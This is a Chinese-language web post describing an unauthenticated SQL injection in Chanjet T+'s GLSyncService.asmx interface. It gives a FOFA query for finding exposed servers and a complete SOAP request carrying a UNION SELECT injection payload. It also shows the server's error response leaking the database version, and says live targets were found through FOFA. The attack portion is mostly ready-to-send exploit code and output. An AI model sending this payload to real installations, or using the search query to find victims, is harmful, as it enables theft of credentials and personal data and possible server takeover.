LOGO OA教程 ERP教程 模切知识交流 PMS教程 CRM教程 开发文档 其他文档  
 
网站管理员

[点晴永久免费OA]畅捷通T+ GLSyncService.asmx存在SQL注入漏洞
admin
2025年7月17日 21:43 本文热度 1020

漏洞说明:

由于畅捷通T+的GLSyncService.asmx接口处未对用户的输入进行过滤和校验,未经身份验证的攻击者除了可以利用 SQL 注)漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马进一步获取服务器系统权限。

漏洞类型:

数据注入

漏洞特征:

FOFA:app="畅捷通-TPlus"

POC:

POST /tplus/GLSyncService.asmx HTTP/1.1SOAPAction: "http://www.chanjet.com/GetSourceAccountDataTable"Accept-Encoding: gzipContent-Type: text/xml; charset=utf-8<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">  <soap:Body>    <GetSourceAccountDataTable xmlns="http://www.chanjet.com/">      <versionType>' UNION ALL SELECT NULL,@@VERSION,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- VsIH</versionType>    </GetSourceAccountDataTable>  </soap:Body></soap:Envelope>

渗透过程:

通过漏洞特征在FOFA找到目标

通过poc拿到数据库版本信息,成功复现漏洞,点到为止

HTTP/1.1 500 Internal Server ErrorServer: nginx/1.9.9Date: Thu, 26 Jun 2025 13:46:01 GMTContent-Type: text/xml; charset=utf-8Content-Length: 1226Connection: keep-aliveX-AspNet-Version: 4.0.30319Cache-Control: private<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"><soap:Body><soap:Fault><faultcode>soap:Server</faultcode><faultstring>System.Web.Services.Protocols.SoapException: 服务器无法处理请求。 ---&gt; Ufida.T.EAP.ErrorInfo.DatabaseException: 245 数据库错误, 请重试!在将 nvarchar 值 'Microsoft SQL Server 2008 R2 (RTM) - 10.50.1600.1 (X64) 	Apr  2 2010 15:48:46 	Copyright (c) Microsoft Corporation	Enterprise Edition (64-bit) on Windows NT 6.2 &lt;X64&gt; (Build 9200: ) (Hypervisor)' 转换成数据类型 int 时失败。   在 Ufida.T.EAP.Aop.Dynamic.LocalCallDynamicProxyImpl.NormalInvoke(MethodBase method, Object[] args, Boolean needFreeCuid)   在 Ufida.T.EAP.Aop.Dynamic.LocalCallDynamicProxyImpl.Invoke(IMessage message)   在 System.Runtime.Remoting.Proxies.RealProxy.PrivateInvoke(MessageData&amp; msgData, Int32 type)   在 Ufida.T.Tool.Sync.Interface.ISyncServiceHelper.GetSourceAccountDataTable(String versionType)   --- 内部异常堆栈跟踪的结尾 ---</faultstring><detail /></soap:Fault></soap:Body></soap:Envelope>


阅读原文:原文链接


该文章在 2025/7/18 10:43:10 编辑过
关键字查询
相关文章
正在查询...
点晴ERP是一款针对中小制造业的专业生产管理软件系统,系统成熟度和易用性得到了国内大量中小企业的青睐。
点晴PMS码头管理系统主要针对港口码头集装箱与散货日常运作、调度、堆场、车队、财务费用、相关报表等业务管理,结合码头的业务特点,围绕调度、堆场作业而开发的。集技术的先进性、管理的有效性于一体,是物流码头及其他港口类企业的高效ERP管理信息系统。
点晴WMS仓储管理系统提供了货物产品管理,销售管理,采购管理,仓储管理,仓库管理,保质期管理,货位管理,库位管理,生产管理,WMS管理系统,标签打印,条形码,二维码管理,批号管理软件。
点晴免费OA是一款软件和通用服务都免费,不限功能、不限时间、不限用户的免费OA协同办公管理系统。
Copyright 2010-2025 ClickSun All Rights Reserved